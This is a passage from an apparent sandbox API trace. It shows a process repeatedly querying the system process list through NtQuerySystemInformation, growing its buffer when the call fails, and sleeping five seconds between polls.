ResultLength=0x0) returned 0xc0000004 [0216.628] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.628] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.633] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.634] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.647] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.647] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.651] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.656] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.677] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.694] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.698] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.702] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.706] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.706] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.754] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.755] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.756] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.759] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.760] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.782] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.782] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.786] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.800] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.801] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.806] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.821] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.822] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.883] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.884] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.899] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.900] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.907] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.954] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.967] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.975] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.987] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.993] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.995] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.996] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.996] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.996] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.001] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.002] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.003] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.003] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.008] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.014] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.016] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.016] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.021] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.023] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.023] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.027] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.028] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.030] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.031] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.031] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.035] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.035] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.038] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.043] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.045] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.050] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.052] NtAllocateVirtualMemory (in: 